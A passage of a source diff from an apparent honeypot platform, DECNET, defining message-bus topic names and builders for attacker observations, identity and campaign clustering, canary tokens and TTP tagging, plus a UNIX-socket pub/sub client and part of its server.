 # provider summary so SIEM-bound webhooks don't need to re-query the DB.
 ATTACKER_INTEL_ENRICHED = "intel.enriched"
 # Per-primitive BEHAVE-SHELL observation. Full topic shape:
 #   attacker.observation.<primitive>
 # e.g. ``attacker.observation.motor.input_modality``.  Producer:
 # ``decnet/profiler/behave_shell/`` (extractor library called from the
 # profiler worker on ``attacker.session.ended``); consumers: dashboard
 # SSE relay, attribution engine state machine, federation gossip
 # (post-v0).  See development/BEHAVE-INTEGRATION.md §"Bus topics" for
 # the wire-format contract — the prefix is documentation + pattern
 # match only; bus auth is socket file perms (DEBT-029 §2), not
 # topic-level.  The ``primitive`` segment MAY contain dots
 # (``motor.shell_mastery.tab_completion``) — the same dotted-leaf
 # rule that ``attacker.session.ended`` uses.
 ATTACKER_OBSERVATION_PREFIX = "observation"
 # Identity-resolution event types (second/third tokens under ``identity``).
 # Published by the (future) clusterer worker — see
 # development/IDENTITY_RESOLUTION.md.  Constants ship in this commit;
 # no publishers exist yet, but consumers (webhook worker, dashboard
 # SSE relay) can subscribe to ``identity.>`` from day one and receive
 # events the instant the clusterer comes online.
 #
 #   identity.formed              — clusterer creates a new identity from
 #                                  one or more observations
 #   identity.observation.linked  — observation attached to an existing
 #                                  identity (or reattached from another)
 #   identity.merged              — two identities collapsed; loser gets
 #                                  ``merged_into_uuid`` set, subscribers
 #                                  re-key cached references to the winner
 #   identity.unmerged            — revocable-merge undo: contradicting
 #                                  evidence cleared ``merged_into_uuid``
 #                                  and re-split observations.  The
 #                                  resurrected side's UUID is the same
 #                                  as the prior loser, so subscribers
 #                                  that cached references to the loser
 #                                  during the merged interval can
 #                                  re-attach without a new lookup.
 #
 # ``identity.campaign.assigned`` is deferred; it ships when the campaign
 # clusterer ships.  YAGNI before then.
 IDENTITY_FORMED = "formed"
 IDENTITY_OBSERVATION_LINKED = "observation.linked"
 IDENTITY_MERGED = "merged"
 IDENTITY_UNMERGED = "unmerged"
 # Campaign-clusterer cross-family event — fires under ``identity.>`` so
 # identity-stream subscribers (e.g. the IdentityDetail SSE client) get
 # notified the moment an identity's ``campaign_id`` changes without
 # having to subscribe to the campaign topic family.  The same event
 # fires under ``campaign.identity.assigned`` for campaign-side
 # subscribers.
 IDENTITY_CAMPAIGN_ASSIGNED = "campaign.assigned"
 # Campaign-clusterer event types (second/third tokens under
 # ``campaign``).  Mirror of the identity family at the layer above:
 # campaigns group identities into operations, and the clusterer
 # publishes the same form / link / merge / unmerge lifecycle.
 #
 #   campaign.formed              — clusterer creates a new campaign from
 #                                  one or more identities
 #   campaign.identity.assigned   — identity attached to an existing
 #                                  campaign (or reassigned from another)
 #   campaign.merged              — two campaigns collapsed; loser gets
 #                                  ``merged_into_uuid`` set, subscribers
 #                                  re-key cached references to the winner
 #   campaign.unmerged            — revocable-merge undo: contradicting
 #                                  evidence cleared ``merged_into_uuid``
 #                                  and re-split identities
 CAMPAIGN_FORMED = "formed"
 CAMPAIGN_IDENTITY_ASSIGNED = "identity.assigned"
 CAMPAIGN_MERGED = "merged"
 CAMPAIGN_UNMERGED = "unmerged"
 # Credential event types (second/third tokens under ``credential``).
 # ``credential.captured`` fires once per upserted Credential row — the
 # correlator listens for it and runs the cred-reuse query in response,
 # so reuse detection latency is sub-second after a fresh capture.
 # ``credential.reuse.detected`` fires when the correlator inserts a new
 # CredentialReuse row or grows an existing one (added decky/service/IP).
 CREDENTIAL_CAPTURED = "captured"
 CREDENTIAL_REUSE_DETECTED = "reuse.detected"
 # Attribution-engine event types (second/third tokens under
 # ``attribution``).  Published by the v0 attribution worker
 # (``decnet.correlation.attribution_worker``) which subscribes to
 # ``attacker.observation.>`` and runs the per-(identity, primitive)
 # state machine.  See ``development/ATTRIBUTION-ENGINE.md``.
 #
 #   attribution.profile.state_changed         — per-primitive state
 #                                               transition (e.g.
 #                                               stable → drifting).
 #                                               Payload: identity_uuid,
 #                                               primitive, old_state,
 #                                               new_state, current_value,
 #                                               confidence,
 #                                               observation_count, ts.
 #   attribution.profile.multi_actor_suspected — fires when ≥ 2
 #                                               primitives flag the same
 #                                               identity as multi_actor
 #                                               concurrently. Cross-
 #                                               primitive correlator;
 #                                               single-primitive
 #                                               multi_actor is too noisy
 #                                               on its own. Payload:
 #                                               identity_uuid, primitives,
 #                                               evidence_summary,
 #                                               confidence, ts.
 #
 # These are *derived* signals — distinct from
 # ``identity.*`` (clusterer lifecycle, IDENTITY_RESOLUTION.md) and
 # ``attacker.observation.*`` (raw extractor envelopes,
 # BEHAVE-INTEGRATION.md). The three families compose: observations feed
 # the attribution engine, the engine emits derived state, the clusterer
 # reads observations + state to form / merge identities.
 ATTRIBUTION_PROFILE_PREFIX = "profile"
 ATTRIBUTION_PROFILE_STATE_CHANGED = "profile.state_changed"
 ATTRIBUTION_PROFILE_MULTI_ACTOR_SUSPECTED = "profile.multi_actor_suspected"
 # Canary-token event types (third token under ``canary``).
 #
 #   canary.{token_id}.placed     — orchestrator/API successfully planted a
 #                                  canary artifact inside a decky's
 #                                  filesystem (or persisted a passive token
 #                                  that has no callback wiring).  Lets
 #                                  dashboards reflect baseline coverage in
 #                                  real time without a DB poll.
 #   canary.{token_id}.triggered  — ``decnet canary`` worker observed a
 #                                  callback hit (HTTP slug or DNS subdomain
 #                                  lookup) for the token.  Payload carries
 #                                  ``src_ip``, ``user_agent``, ``request_path``
 #                                  and any DNS qname so downstream
 #                                  consumers (correlator, webhook fanout)
 #                                  can attribute and forward without a
 #                                  follow-up DB read.
 #   canary.{token_id}.revoked    — operator removed a token; planter unlinked
 #                                  the file (best-effort) and the row was
 #                                  marked ``revoked``.  Subscribers may
 #                                  evict cached lookups by token id.
 CANARY_PLACED = "placed"
 CANARY_TRIGGERED = "triggered"
 CANARY_REVOKED = "revoked"
 # Orchestrator event types (second token under ``orchestrator``).  The
 # orchestrator worker publishes one of these per synthetic action it
 # drives against a decky — cheap inter-decky traffic and filesystem
 # mutations whose role is to keep the honeypot from looking suspiciously
 # static.  Always nested with the destination decky uuid as the third
 # token, so consumers can subscribe to a single decky's life-injection
 # stream via ``orchestrator.*.<decky_uuid>``.
 ORCHESTRATOR_TRAFFIC = "traffic"
 ORCHESTRATOR_FILE = "file"
 # Emailgen — published by the ``decnet emailgen`` worker once per generated
 # fake email delivered into a mail decky's maildir.  Third token is the
 # destination mail-decky uuid (the IMAP/POP3 host serving the mailbox),
 # matching the ``orchestrator.*.<decky_uuid>`` subscription pattern.
 ORCHESTRATOR_EMAIL = "email"
 # System event types.
 SYSTEM_LOG = "log"
 SYSTEM_BUS_HEALTH = "bus.health"
 # Worker-health leaf — built per-worker as ``system.<worker>.health`` via
 # :func:`system_health`.  The leaf constant stays the same across workers;
 # the worker name goes in the middle token.
 SYSTEM_HEALTH = "health"
 # Worker-control leaf — built per-worker as ``system.<worker>.control`` via
 # :func:`system_control`.  Admin-originated stop intents travel on this
 # topic; each worker subscribes to its own.
 SYSTEM_CONTROL = "control"
 # Control payload ``action`` values — the wire vocabulary.  Only ``stop`` is
 # handled in v1; ``start`` is reserved because a stopped worker has no
 # subscriber, so starting requires external supervision (systemd).
 WORKER_CONTROL_STOP = "stop"
 WORKER_CONTROL_START = "start"
 # Webhook subscription-set changed — published by the CRUD router after any
 # create / update / delete on WebhookSubscription so the webhook worker can
 # reload its in-memory subscription list and re-subscribe to the new union
 # of patterns. Payload is currently empty; consumers only need the signal.
 WEBHOOK_SUBSCRIPTIONS_CHANGED = "system.webhook.subscriptions_changed"
 # Email-receipt event — fired by smtp / smtp-relay services on full-message
 # receipt (envelope + headers + body + attachments captured). Single-token
 # leaf so the bus tokenizer accepts it directly under the ``email`` root.
 # Consumed by the TTP ``email_lifter`` for header / body-pattern / attachment
 # rules. PII rule (TTP_TAGGING.md "Hard parts §6"): payload carries hashes,
 # counts, header names, and rcpt-domain sets — never rcpt addresses or body
 # bytes.
 EMAIL_RECEIVED = "received"
 # TTP-tagging event types (second/third tokens under ``ttp``).
 #
 #   ttp.tagged                     — one or more new tags written. Published
 #                                    only when ``INSERT OR IGNORE`` wrote at
 #                                    least one new row; idempotent
 #                                    re-evaluations publish nothing
 #                                    (loop-prevention invariant — see
 #                                    TTP_TAGGING.md).
 #   ttp.rule.fired.{technique_id}  — per-technique fan-out for SIEM
 #                                    consumers that subscribe to a single
 #                                    technique. Topic key is the parent
 #                                    technique; sub_technique is in the
 #                                    payload. Built via :func:`ttp_rule_fired`.
 #   ttp.rule.suppressed            — rule fired but the tag was dropped
 #                                    (confidence below floor, rate-limited,
 #                                    or the rule's RuleState was disabled).
 #                                    Observability signal for the dashboard.
 #
 # Per-rule reload + state-change topics. Built via
 # :func:`ttp_rule_reloaded` / :func:`ttp_rule_state`; SIEM consumers
 # subscribe to ``ttp.rule.reloaded.>`` (every rule) or
 # ``ttp.rule.reloaded.R0001`` (one rule) at their preferred granularity.
 TTP_TAGGED = "tagged"
 TTP_RULE_FIRED = "rule.fired"
 TTP_RULE_SUPPRESSED = "rule.suppressed"
 TTP_RULE_RELOADED = "rule.reloaded"
 TTP_RULE_STATE = "rule.state"
 # ─── Builders ────────────────────────────────────────────────────────────────
 def topology_mutation(topology_id: str, state: str) -> str:
    """Build ``topology.<id>.mutation.<state>``.
    *state* should be one of the ``MUTATION_*`` constants.
    """
    _reject_tokens(topology_id, state)
    return f"{TOPOLOGY}.{topology_id}.mutation.{state}"
 def topology_status(topology_id: str) -> str:
    """Build ``topology.<id>.status``."""
    _reject_tokens(topology_id)
    return f"{TOPOLOGY}.{topology_id}.{TOPOLOGY_STATUS}"
 def decky(decky_id: str, event_type: str) -> str:
    """Build ``decky.<id>.<event_type>``.
    *event_type* is typically one of ``DECKY_STATE`` or ``DECKY_TRAFFIC``.
    """
    _reject_tokens(decky_id, event_type)
    return f"{DECKY}.{decky_id}.{event_type}"
 def decky_mutation(decky_id: str) -> str:
    """Build ``decky.<id>.mutation``."""
    _reject_tokens(decky_id)
    return f"{DECKY}.{decky_id}.{DECKY_MUTATION}"
 def decky_lifecycle(decky_id: str) -> str:
    """Build ``decky.<id>.lifecycle``."""
    _reject_tokens(decky_id)
    return f"{DECKY}.{decky_id}.{DECKY_LIFECYCLE}"
 def system(event_type: str) -> str:
    """Build ``system.<event_type>``.
    *event_type* may itself contain dots (e.g. ``bus.health``) — we don't
    re-validate the already-constant leaves; this just prefixes.
    """
    if not event_type:
        raise ValueError("system topic requires a non-empty event_type")
    return f"{SYSTEM}.{event_type}"
 def credential(event_type: str) -> str:
    """Build ``credential.<event_type>``.
    *event_type* is typically one of :data:`CREDENTIAL_CAPTURED` or
    :data:`CREDENTIAL_REUSE_DETECTED`. Dotted leaves
    (``reuse.detected``) are permitted — same rationale as
    :func:`system`.
    """
    if not event_type:
        raise ValueError("credential topic requires a non-empty event_type")
    return f"{CREDENTIAL}.{event_type}"
 def attacker(event_type: str) -> str:
    """Build ``attacker.<event_type>``.
    *event_type* is typically one of ``ATTACKER_OBSERVED``,
    ``ATTACKER_SCORED``, ``ATTACKER_SESSION_STARTED``,
    ``ATTACKER_SESSION_ENDED``.  Dotted leaves (``session.started``) are
    permitted — same rationale as :func:`system`.
    """
    if not event_type:
        raise ValueError("attacker topic requires a non-empty event_type")
    return f"{ATTACKER}.{event_type}"
 def attacker_observation(primitive: str) -> str:
    """Build ``attacker.observation.<primitive>``.
    *primitive* is the fully-qualified BEHAVE-SHELL primitive path
    (e.g. ``motor.input_modality``,
    ``cognitive.feedback_loop_engagement``,
    ``motor.shell_mastery.tab_completion``).  Dotted primitives are
    permitted — this matches the format
    ``behave_shell.spec.event_adapter.event_topic_for`` produces
    upstream, and DECNET's bus admits the dotted leaf the same way
    :func:`attacker` does for ``session.started``.
    Empty string is rejected so a downstream typo doesn't ship as
    ``attacker.observation.``.
    """
    if not primitive:
        raise ValueError(
            "attacker_observation topic requires a non-empty primitive",
        )
    return f"{ATTACKER}.{ATTACKER_OBSERVATION_PREFIX}.{primitive}"
 def attribution(event_type: str) -> str:
    """Build ``attribution.<event_type>``.
    *event_type* is typically one of
    :data:`ATTRIBUTION_PROFILE_STATE_CHANGED` or
    :data:`ATTRIBUTION_PROFILE_MULTI_ACTOR_SUSPECTED` — both contain a
    dot (``profile.state_changed``) which is permitted under the same
    "trailing dotted leaf" rule that ``attacker.session.started`` uses.
    """
    if not event_type:
        raise ValueError("attribution topic requires a non-empty event_type")
    return f"{ATTRIBUTION}.{event_type}"
 def campaign(event_type: str) -> str:
    """Build ``campaign.<event_type>``.
    *event_type* is typically one of :data:`CAMPAIGN_FORMED`,
    :data:`CAMPAIGN_IDENTITY_ASSIGNED`, :data:`CAMPAIGN_MERGED`, or
    :data:`CAMPAIGN_UNMERGED`. Dotted leaves (``identity.assigned``)
    are permitted — same rationale as :func:`system`.
    """
    if not event_type:
        raise ValueError("campaign topic requires a non-empty event_type")
    return f"{CAMPAIGN}.{event_type}"
 def identity(event_type: str) -> str:
    """Build ``identity.<event_type>``.
    *event_type* is typically one of :data:`IDENTITY_FORMED`,
    :data:`IDENTITY_OBSERVATION_LINKED`, :data:`IDENTITY_MERGED`, or
    :data:`IDENTITY_UNMERGED`. Dotted leaves (``observation.linked``)
    are permitted — same rationale as :func:`system`.
    """
    if not event_type:
        raise ValueError("identity topic requires a non-empty event_type")
    return f"{IDENTITY}.{event_type}"
 def orchestrator(event_type: str, decky_id: str) -> str:
    """Build ``orchestrator.<event_type>.<decky_id>``.
    *event_type* should be one of :data:`ORCHESTRATOR_TRAFFIC` or
    :data:`ORCHESTRATOR_FILE`. The destination decky is always the
    third token so per-decky subscribers can use
    ``orchestrator.*.<decky_uuid>``.
    """
    _reject_tokens(event_type, decky_id)
    return f"{ORCHESTRATOR}.{event_type}.{decky_id}"
 def canary(token_id: str, event_type: str) -> str:
    """Build ``canary.<token_id>.<event_type>``.
    *event_type* should be one of :data:`CANARY_PLACED`,
    :data:`CANARY_TRIGGERED`, or :data:`CANARY_REVOKED`.  The token id
    is always the second token so per-token subscribers can use
    ``canary.<token_id>.>`` and fleet-wide consumers (webhook fanout,
    correlator) use ``canary.>``.
    """
    _reject_tokens(token_id, event_type)
    return f"{CANARY}.{token_id}.{event_type}"
 def system_health(worker: str) -> str:
    """Build ``system.<worker>.health``.
    Worker-health heartbeats live as a nested leaf under ``system`` so
    consumers can subscribe to ``system.*.health`` for every worker at
    once, or to ``system.mutator.health`` for a single one.  *worker* is
    validated as a regular segment — no dots, wildcards, or whitespace.
    """
    _reject_tokens(worker)
    return f"{SYSTEM}.{worker}.{SYSTEM_HEALTH}"
 def system_control(worker: str) -> str:
    """Build ``system.<worker>.control``.
    Admin-originated stop (and, eventually, start) intents are published
    here; the worker in question subscribes to its own address and reacts.
    Payload shape::
        {"action": "stop", "requested_by": "<username>", "ts": <unix>}
    *action* must be one of :data:`WORKER_CONTROL_STOP` /
    :data:`WORKER_CONTROL_START`; any other value is ignored by the
    listener.  Same segment rules as :func:`system_health`.
    """
    _reject_tokens(worker)
    return f"{SYSTEM}.{worker}.{SYSTEM_CONTROL}"
 def smtp(event_type: str) -> str:
    """Build ``smtp.<event_type>``.
    *event_type* may contain dots (e.g. ``probe.pending``).
    """
    if not event_type:
        raise ValueError("smtp topic requires a non-empty event_type")
    return f"{SMTP}.{event_type}"
 def email_topic(event_type: str) -> str:
    """Build ``email.<event_type>``.
    Named ``email_topic`` rather than ``email`` to avoid shadowing the
    Python ``email`` stdlib package at import sites that pull both.
    *event_type* is typically :data:`EMAIL_RECEIVED`.
    """
    if not event_type:
        raise ValueError("email topic requires a non-empty event_type")
    return f"{EMAIL}.{event_type}"
 def ttp(event_type: str) -> str:
    """Build ``ttp.<event_type>``.
    *event_type* is typically one of :data:`TTP_TAGGED`,
    :data:`TTP_RULE_FIRED`, or :data:`TTP_RULE_SUPPRESSED`. Dotted
    leaves (``rule.fired``) are permitted — same rationale as
    :func:`system`. For per-technique fan-out use
    :func:`ttp_rule_fired`.
    """
    if not event_type:
        raise ValueError("ttp topic requires a non-empty event_type")
    return f"{TTP}.{event_type}"
 def ttp_rule_fired(technique_id: str) -> str:
    """Build ``ttp.rule.fired.<technique_id>``.
    Per-technique fan-out: SIEM subscribers can listen on
    ``ttp.rule.fired.>`` for everything, ``ttp.rule.fired.T1110`` for
    one technique. *technique_id* is validated as a single segment —
    sub-techniques like ``T1110.001`` are rejected because they would
    split into two tokens. The topic key is the parent technique;
    ``sub_technique_id`` lives in the payload.
    """
    _reject_tokens(technique_id)
    return f"{TTP}.rule.fired.{technique_id}"
 def ttp_rule_reloaded(rule_id: str) -> str:
    """Build ``ttp.rule.reloaded.<rule_id>``.
    Per-rule fan-out fired by the :class:`~decnet.ttp.store.base.RuleStore`
    when a rule's *definition* changes (YAML edit on the filesystem
    backend, ``ttp_rule`` row update on the database backend). One event
    per per-rule edit — never batched (the "incremental, never batched"
    property in TTP_TAGGING.md §"Bus topics" inherits its granularity
    from :meth:`RuleStore.subscribe_changes`).
    Subscribers: ``ttp.rule.reloaded.>`` for every rule,
    ``ttp.rule.reloaded.R0001`` for one. *rule_id* is validated as a
    single segment.
    """
    _reject_tokens(rule_id)
    return f"{TTP}.{TTP_RULE_RELOADED}.{rule_id}"
 def ttp_rule_state(rule_id: str) -> str:
    """Build ``ttp.rule.state.<rule_id>``.
    Per-rule fan-out fired by the :class:`~decnet.ttp.store.base.RuleStore`
    when a rule's *operational state* changes (operator hits the disable
    button, an ``expires_at`` TTL fires and auto-reverts the state).
    *rule_id* is validated as a single segment.
    """
    _reject_tokens(rule_id)
    return f"{TTP}.{TTP_RULE_STATE}.{rule_id}"
 def _reject_tokens(*parts: str) -> None:
    """Reject topic segments that would break NATS-style tokenization.
    Dots, wildcards, whitespace, and empty strings in a *segment* would
    silently corrupt the hierarchy (e.g. ``topology.a.b.status`` for a
    ``topology_id`` of ``"a.b"``).  Raise early at the builder instead of
    shipping a malformed topic to the wire.
    """
    for p in parts:
        if not p:
            raise ValueError("topic segment must not be empty")
        if "." in p or "*" in p or ">" in p or any(c.isspace() for c in p):
            raise ValueError(
                f"topic segment {p!r} may not contain '.', '*', '>', or whitespace"
            )
--- a/decnet/bus/unix_client.py
+++ b/decnet/bus/unix_client.py
@@ -0,0 +1,258 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """UNIX-socket client — :class:`UnixSocketBus` implementation of :class:`BaseBus`.
 Holds one open socket to the local :class:`~decnet.bus.unix_server.BusServer`.
 Operations:
 * :meth:`publish` writes a single ``PUB`` frame and returns; no ack.
 * :meth:`subscribe` writes a ``SUB`` frame and returns a
  :class:`~decnet.bus.base.Subscription` backed by an :class:`asyncio.Queue`
  that the background reader task feeds.
 One background reader task per bus instance dispatches incoming ``EVT``
 frames to every registered subscription whose pattern matches the topic.
 On connection drop or close, every subscription is woken via a sentinel so
 iterators unblock cleanly; callers see :class:`StopAsyncIteration` from the
 ``async for`` loop.
 No auto-reconnect in MVP.  If the server restarts, callers must
 :meth:`close` the bus and construct a new one.  This mirrors how other
 DECNET workers handle their dependencies — the systemd ``Restart=on-failure``
 supervision above us is the retry loop.
 """
 from __future__ import annotations
 import asyncio
 import contextlib
 import os
 import pathlib
 from typing import Any
 from decnet.bus import protocol
 from decnet.bus.base import (
    BaseBus,
    Event,
    Subscription,
    _CLOSE_SENTINEL,
    matches,
 )
 from decnet.bus.fake import _enqueue_drop_oldest as _enqueue_event_drop_oldest
 from decnet.logging import get_logger
 log = get_logger("bus.client")
 _INBOUND_QUEUE_SIZE = 1024
 class _UnixSubscription(Subscription):
    def __init__(
        self,
        bus: "UnixSocketBus",
        pattern: str,
        queue: "asyncio.Queue[Any]",
    ) -> None:
        super().__init__(pattern)
        self._bus = bus
        self._queue = queue
    async def __anext__(self) -> Event:
        if self._closed:
            raise StopAsyncIteration
        item = await self._queue.get()
        if item is _CLOSE_SENTINEL:
            raise StopAsyncIteration
        return item
    async def _aclose(self) -> None:
        await self._bus._unregister(self)
        try:
            self._queue.put_nowait(_CLOSE_SENTINEL)
        except asyncio.QueueFull:
            pass
 class UnixSocketBus(BaseBus):
    """Client handle for a local :class:`BusServer`.
    One instance per process typically; multiple instances simply open
    multiple sockets to the same server.  Connection is lazy — the first
    :meth:`connect` (or any publish/subscribe call via ``async with``)
    opens the socket.
    """
    def __init__(
        self,
        socket_path: pathlib.Path | str,
        *,
        client_name: str | None = None,
    ) -> None:
        self._path = pathlib.Path(socket_path)
        self._client_name = client_name or f"decnet-bus-client[{os.getpid()}]"
        self._reader: asyncio.StreamReader | None = None
        self._writer: asyncio.StreamWriter | None = None
        self._reader_task: asyncio.Task[None] | None = None
        self._subs: list[_UnixSubscription] = []
        self._lock = asyncio.Lock()
        self._write_lock = asyncio.Lock()
        self._closed = False
        # Sticky flag: the first publish-on-closed-bus call logs at
        # WARNING so operators see that a publish was dropped; subsequent
        # calls on the same instance log at DEBUG only to prevent a
        # log flood when stream threads drain after close.  The bus is
        # critical infra, so the first warning is non-negotiable.
        self._closed_publish_warned = False
    # ─── Lifecycle ──────────────────────────────────────────────────────────
    async def connect(self) -> None:
        if self._writer is not None:
            return
        if self._closed:
            raise RuntimeError("connect on closed bus")
        self._reader, self._writer = await asyncio.open_unix_connection(str(self._path))
        await self._send(protocol.encode(protocol.HELLO, args=self._client_name))
        self._reader_task = asyncio.create_task(self._reader_loop())
        log.debug("bus.client: connected to %s as %s", self._path, self._client_name)
    async def close(self) -> None:
        if self._closed:
            return
        self._closed = True
        # Best-effort BYE — we don't care if it fails.
        if self._writer is not None and not self._writer.is_closing():
            with contextlib.suppress(Exception):
                await self._send(protocol.encode(protocol.BYE))
        if self._reader_task is not None:
            self._reader_task.cancel()
            with contextlib.suppress(asyncio.CancelledError):
                await self._reader_task
            self._reader_task = None
        if self._writer is not None:
            with contextlib.suppress(Exception):
                self._writer.close()
                await self._writer.wait_closed()
            self._writer = None
            self._reader = None
        # Wake every subscription so `async for` exits.
        for sub in list(self._subs):
            with contextlib.suppress(asyncio.QueueFull):
                sub._queue.put_nowait(_CLOSE_SENTINEL)
        self._subs.clear()
    # ─── Pub/Sub ────────────────────────────────────────────────────────────
    async def publish(
        self,
        topic: str,
        payload: dict[str, Any],
        *,
        event_type: str = "",
    ) -> None:
        if self._closed:
            # Degrade gracefully: the DB is the source of truth, the bus
            # is only the notification layer.  Raising here made every
            # caller via publish_safely flood the logs once per stream
            # line during shutdown races.  First drop warns loudly;
            # subsequent drops on the same instance are DEBUG-only.
            if not self._closed_publish_warned:
                self._closed_publish_warned = True
                log.warning(
                    "bus.client: publish on closed bus dropped topic=%s "
                    "(further drops on this instance logged at DEBUG)",
                    topic,
                )
            else:
                log.debug("bus.client: publish on closed bus dropped topic=%s", topic)
            return
        if self._writer is None:
            await self.connect()
        body = Event(topic=topic, payload=payload, type=event_type).to_dict()
        try:
            await self._send(protocol.encode(protocol.PUB, args=topic, body=body))
        except (ConnectionError, BrokenPipeError) as exc:
            # Bus loss is a logged warning, never a publisher crash.  The
            # DB-as-source-of-truth invariant means the work is already
            # persisted; the missing event is just a missed notification.
            log.warning("bus.client: publish failed: %s", exc)
    def subscribe(self, pattern: str) -> Subscription:
        if self._closed:
            raise RuntimeError("subscribe on closed bus")
        queue: asyncio.Queue[Any] = asyncio.Queue(maxsize=_INBOUND_QUEUE_SIZE)
        sub = _UnixSubscription(self, pattern, queue)
        self._subs.append(sub)
        # Schedule the SUB frame asynchronously so subscribe() stays sync,
        # matching the BaseBus signature.  The caller will shortly `async
        # with` / `async for` the subscription, which will run the event
        # loop and pick this task up.
        asyncio.ensure_future(self._send_sub(pattern))
        return sub
    async def _send_sub(self, pattern: str) -> None:
        try:
            if self._writer is None:
                await self.connect()
            await self._send(protocol.encode(protocol.SUB, args=pattern))
        except Exception as exc:  # pragma: no cover - network paths in live tests
            log.warning("bus.client: SUB %s failed: %s", pattern, exc)
    async def _unregister(self, sub: _UnixSubscription) -> None:
        try:
            self._subs.remove(sub)
        except ValueError:
            return
        # Tell the server we no longer want events for this pattern if no
        # other local subscription still wants it.
        if not any(s.pattern == sub.pattern for s in self._subs):
            with contextlib.suppress(Exception):
                await self._send(protocol.encode(protocol.UNSUB, args=sub.pattern))
    # ─── Internal I/O ───────────────────────────────────────────────────────
    async def _send(self, frame_bytes: bytes) -> None:
        if self._writer is None:
            raise ConnectionError("bus.client: not connected")
        async with self._write_lock:
            self._writer.write(frame_bytes)
            await self._writer.drain()
    async def _reader_loop(self) -> None:
        if self._reader is None:
            return
        try:
            while True:
                frame = await protocol.read_frame(self._reader)
                if frame is None:
                    break
                if frame.verb != protocol.EVT:
                    # Clients only ever legitimately receive EVT (or BYE).
                    if frame.verb == protocol.BYE:
                        break
                    log.warning("bus.client: unexpected verb from server: %s", frame.verb)
                    continue
                topic = frame.args
                data = protocol.decode_body(frame.body) if frame.body else {}
                event = Event.from_dict(topic, data)
                self._dispatch(event)
        except protocol.ProtocolError as exc:
            log.warning("bus.client: protocol error: %s", exc)
        except (asyncio.IncompleteReadError, ConnectionError):
            pass
        except asyncio.CancelledError:
            raise
        except Exception:  # pragma: no cover
            log.exception("bus.client: reader loop crashed")
        finally:
            # Server-side close — wake every subscription.
            for sub in list(self._subs):
                with contextlib.suppress(asyncio.QueueFull):
                    sub._queue.put_nowait(_CLOSE_SENTINEL)
    def _dispatch(self, event: Event) -> None:
        for sub in self._subs:
            if matches(sub.pattern, event.topic):
                _enqueue_event_drop_oldest(sub._queue, event)
--- a/decnet/bus/unix_server.py
+++ b/decnet/bus/unix_server.py
@@ -0,0 +1,310 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """UNIX-socket server for the DECNET bus.
 One :class:`BusServer` per host.  Accepts local connections on a UNIX-domain
 socket; each connection may:
 * publish events (``PUB`` frames) that the server fans out to all matching
  subscribers on other connections, and
 * subscribe to patterns (``SUB`` frames) and receive matching events as
  ``EVT`` frames.
 Authorization is socket file permissions (0660, group=``decnet`` if that
 POSIX group exists, else the server process's own group).  Anything the
 kernel lets ``connect()`` is trusted — there is no verb-level auth.  This
 matches the "local processes on the same host" threat model; cross-host
 federation is out of scope (see DEBT-029).
 Backpressure is per-connection, drop-oldest: if a subscriber can't drain its
 outbound queue fast enough, the server discards the oldest pending event
 rather than blocking publishers.  The bus is at-most-once by contract, so
 drops are acceptable; stalled publishers are not.
 """
 from __future__ import annotations
 import asyncio
 import contextlib
 import grp
 import os
 import pathlib
 from dataclasses import dataclass, field
 from typing import Any
 from decnet.bus import protocol
 from decnet.bus.base import Event, matches
 from decnet.logging import get_logger
 log = get_logger("bus.server")
 _SOCKET_MODE = 0o660
 _DEFAULT_GROUP = "decnet"
 _OUTBOUND_QUEUE_SIZE = 1024
@dataclass(eq=False)
 class _Connection:
    """Per-connection server state."""
    writer: asyncio.StreamWriter
    peer_name: str = "<unknown>"
    patterns: set[str] = field(default_factory=set)
    outbound: asyncio.Queue[bytes] = field(
        default_factory=lambda: asyncio.Queue(maxsize=_OUTBOUND_QUEUE_SIZE)
    )
    closed: bool = False
 class BusServer:
    """Serve a UNIX-socket bus on *socket_path*.
    Lifecycle: construct → :meth:`start` → :meth:`serve_forever` (or rely
    on :meth:`start` returning once bound) → :meth:`close` for teardown.
    Safe to :meth:`close` multiple times.
    """
    def __init__(
        self,
        socket_path: pathlib.Path | str,
        *,
        group: str | None = _DEFAULT_GROUP,
        mode: int = _SOCKET_MODE,
    ) -> None:
        self._path = pathlib.Path(socket_path)
        self._group = group
        self._mode = mode
        self._server: asyncio.base_events.Server | None = None
        self._connections: set[_Connection] = set()
        self._closed = False
    # ─── Lifecycle ──────────────────────────────────────────────────────────
    async def start(self) -> None:
        """Bind the socket and begin accepting connections.
        Removes any stale socket file at *socket_path* first (common case:
        the previous worker crashed without cleaning up).  The parent
        directory must already exist; we do NOT create it blindly because
        the chosen directory (typically ``/run/decnet``) may require
        systemd ``RuntimeDirectory=`` to set up.
        """
        if self._server is not None:
            return
        parent = self._path.parent
        if not parent.exists():
            raise FileNotFoundError(
                f"bus socket parent directory {parent} does not exist; "
                f"create it with systemd RuntimeDirectory= or mkdir"
            )
        # Clean up a stale socket from a previous crash.  If a live server
        # is actually listening there, ``bind()`` below will fail — we do
        # not try to detect live vs. stale ourselves.
        with contextlib.suppress(FileNotFoundError):
            if self._path.is_socket():
                self._path.unlink()
        self._server = await asyncio.start_unix_server(
            self._handle_connection, path=str(self._path),
        )
        _chmod_and_chown(self._path, self._mode, self._group)
        log.info("bus.server: listening on %s (mode=%o group=%s)",
                 self._path, self._mode, self._group or "<inherit>")
    async def serve_forever(self) -> None:
        if self._server is None:
            raise RuntimeError("BusServer not started")
        async with self._server:
            await self._server.serve_forever()
    async def close(self) -> None:
        if self._closed:
            return
        self._closed = True
        if self._server is not None:
            self._server.close()
            with contextlib.suppress(Exception):
                await self._server.wait_closed()
            self._server = None
        # Drain every live connection.
        for conn in list(self._connections):
            await self._close_connection(conn)
        self._connections.clear()
        with contextlib.suppress(FileNotFoundError):
            self._path.unlink()
        log.info("bus.server: closed")
    # ─── Internal publish fan-out ───────────────────────────────────────────
    async def publish(self, topic: str, payload: dict[str, Any], event_type: str = "") -> None:
        """Server-side publish helper — used by the worker to emit
        ``system.bus.health`` heartbeats without opening a client loop."""
        event = Event(topic=topic, payload=payload, type=event_type)
        self._fanout(event)
    # ─── Connection handler ─────────────────────────────────────────────────
    async def _handle_connection(
        self,
        reader: asyncio.StreamReader,
        writer: asyncio.StreamWriter,
    ) -> None:
        conn = _Connection(writer=writer)
        self._connections.add(conn)
        writer_task = asyncio.create_task(self._writer_loop(conn))
        try:
            await self._reader_loop(conn, reader)
        except protocol.ProtocolError as exc:
            log.warning("bus.server: protocol error from %s: %s", conn.peer_name, exc)
        except (asyncio.IncompleteReadError, ConnectionError) as exc:
